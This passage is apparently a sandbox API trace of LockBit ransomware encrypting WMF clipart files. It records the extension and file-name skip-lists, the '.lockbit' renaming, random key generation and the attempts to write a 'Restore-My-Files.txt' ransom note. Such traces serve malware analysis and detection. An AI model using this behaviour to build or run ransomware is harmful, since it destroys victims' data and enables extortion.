dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.740] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6e34, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090149.WMF", cAlternateFileName="")) returned 1 [0120.740] lstrcmpiW (lpString1=".", lpString2="J0090149.WMF") returned -1 [0120.740] lstrcmpiW (lpString1="..", lpString2="J0090149.WMF") returned -1 [0120.740] PathFindExtensionW (pszPath="J0090149.WMF") returned=".WMF" [0120.740] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.740] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.740] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.740] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.740] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.740] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.741] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.741] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.742] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090149.WMF") returned 1 [0120.742] lstrcmpiW (lpString1="ntldr", lpString2="J0090149.WMF") returned 1 [0120.742] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090149.WMF") returned 1 [0120.742] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090149.WMF") returned -1 [0120.742] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090149.WMF") returned -1 [0120.742] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090149.WMF") returned 1 [0120.743] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090149.WMF") returned -1 [0120.743] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.743] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned=".WMF" [0120.743] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.743] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.743] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.744] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.744] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.744] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.744] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.744] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.lockbit") returned 72 [0120.744] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0120.744] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.744] malloc (_Size=0x40068) returned 0x3d70450 [0120.744] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=28212) returned 1 [0120.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0120.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0120.745] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.749] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.749] malloc (_Size=0xa6) returned 0x77d7a8 [0120.749] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.750] free (_Block=0x77d7a8) [0120.750] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.750] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.750] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x44e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090390.WMF", cAlternateFileName="")) returned 1 [0120.751] lstrcmpiW (lpString1=".", lpString2="J0090390.WMF") returned -1 [0120.751] lstrcmpiW (lpString1="..", lpString2="J0090390.WMF") returned -1 [0120.751] PathFindExtensionW (pszPath="J0090390.WMF") returned=".WMF" [0120.751] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.751] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.752] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.752] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090390.WMF") returned 1 [0120.753] lstrcmpiW (lpString1="ntldr", lpString2="J0090390.WMF") returned 1 [0120.753] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090390.WMF") returned 1 [0120.753] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090390.WMF") returned -1 [0120.753] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090390.WMF") returned -1 [0120.753] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090390.WMF") returned 1 [0120.753] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090390.WMF") returned -1 [0120.753] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.753] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned=".WMF" [0120.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.753] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.753] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.754] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.754] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.lockbit") returned 72 [0120.754] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0120.758] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.758] malloc (_Size=0x40068) returned 0x3e70008 [0120.758] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17638) returned 1 [0120.758] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.759] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0120.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.759] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0120.759] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.762] malloc (_Size=0xa6) returned 0x77d7a8 [0120.762] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.763] free (_Block=0x77d7a8) [0120.763] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.763] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.763] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.763] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd6c900, ftCreationTime.dwHighDateTime=0x1bd6ced, ftLastAccessTime.dwLowDateTime=0x65d84550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3cd6c900, ftLastWriteTime.dwHighDateTime=0x1bd6ced, nFileSizeHigh=0x0, nFileSizeLow=0xd04, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090777.WMF", cAlternateFileName="")) returned 1 [0120.763] lstrcmpiW (lpString1=".", lpString2="J0090777.WMF") returned -1 [0120.763] lstrcmpiW (lpString1="..", lpString2="J0090777.WMF") returned -1 [0120.763] PathFindExtensionW (pszPath="J0090777.WMF") returned=".WMF" [0120.763] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.763] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.763] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.763] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.763] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.763] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.763] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.764] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.764] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.765] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090777.WMF") returned 1 [0120.765] lstrcmpiW (lpString1="ntldr", lpString2="J0090777.WMF") returned 1 [0120.765] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090777.WMF") returned 1 [0120.765] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090777.WMF") returned -1 [0120.765] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090777.WMF") returned -1 [0120.765] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090777.WMF") returned 1 [0120.765] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090777.WMF") returned -1 [0120.765] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.765] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned=".WMF" [0120.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.766] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.766] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 